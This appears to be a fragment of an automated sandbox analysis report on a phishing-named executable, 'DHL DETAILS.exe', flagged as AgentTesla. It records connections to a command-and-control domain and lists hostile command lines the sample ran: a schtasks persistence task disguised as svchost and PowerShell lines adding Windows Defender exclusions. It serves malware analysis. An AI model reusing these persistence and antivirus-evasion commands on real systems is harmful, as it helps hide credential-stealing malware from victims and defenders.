                                                                                    16192.168.2.556165172.67.140.8744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:55 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:56 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:56 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:56 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.562819222.255.238.15944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:15:05 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:15:06 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:15:06 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:15:06 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.563576102.223.20.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:15:07 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:15:08 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:15:08 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:15:08 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:13:14:06
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    Imagebase:0x28f61f60000
                                                                                    File size:40'960 bytes
                                                                                    MD5 hash:0603858E620614E6BADC889156F4F868
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:13:14:07
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:3
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                                    Imagebase:0x7ff7416a0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""
                                                                                    Imagebase:0x7ff7416a0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                                    Imagebase:0x7ff6c1e10000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:13:14:20
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:timeout 3
                                                                                    Imagebase:0x7ff772e90000
                                                                                    File size:32'768 bytes
                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:13:14:21
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Imagebase:0x177458f0000
                                                                                    File size:40'960 bytes
                                                                                    MD5 hash:0603858E620614E6BADC889156F4F868
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 53%, ReversingLabs
                                                                                    • Detection: 35%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:10
                                                                                    Start time:13:14:23
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0x143dae10000
                                                                                    File size:40'960 bytes
                                                                                    MD5 hash:0603858E620614E6BADC889156F4F868
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:12
                                                                                    Start time:13:14:32
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0x23775f40000
                                                                                    File size:40'960 bytes
                                                                                    MD5 hash:0603858E620614E6BADC889156F4F868
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:13
                                                                                    Start time:13:14:36
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                    Imagebase:0x7ff7be880000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:13:14:36
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:13:14:36
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    Imagebase:
                                                                                    File size:43'008 bytes
                                                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:16
                                                                                    Start time:13:14:37
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                    Imagebase:0xd40000
                                                                                    File size:262'432 bytes
                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:13:14:37
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                    Imagebase:0x710000
                                                                                    File size:262'432 bytes
                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:13:14:38
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:19
                                                                                    Start time:13:14:38
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:13:14:41
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0x1c6ae630000
                                                                                    File size:40'960 bytes
                                                                                    MD5 hash:0603858E620614E6BADC889156F4F868
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:21
                                                                                    Start time:13:14:41
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:24
                                                                                    Start time:13:14:59
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
                                                                                    Imagebase:0xeb0000
                                                                                    File size:262'432 bytes
                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:13:14:59
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:13:15:01
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                    Imagebase:0x7ff7be880000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:13:15:02
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:13:15:02
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                    Imagebase:
                                                                                    File size:65'440 bytes
                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:29
                                                                                    Start time:13:15:03
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                    Imagebase:0x9f0000
                                                                                    File size:262'432 bytes
                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:30
                                                                                    Start time:13:15:05
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:13:15:07
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:32
                                                                                    Start time:13:15:09
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
                                                                                    Imagebase:0xd80000
                                                                                    File size:262'432 bytes
                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:33
                                                                                    Start time:13:15:09
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:13:15:28
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                    Imagebase:0x7ff7be880000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:36
                                                                                    Start time:13:15:28
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:13:15:28
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Imagebase:0x4b0000
                                                                                    File size:108'664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:38
                                                                                    Start time:13:15:28
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Imagebase:0x7c0000
                                                                                    File size:108'664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:39
                                                                                    Start time:13:15:29
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:40
                                                                                    Start time:13:15:36
                                                                                    Start date:09/03/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
                                                                                    Imagebase:0x7ff79e7d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:135
                                                                                      Total number of Limit Nodes:14
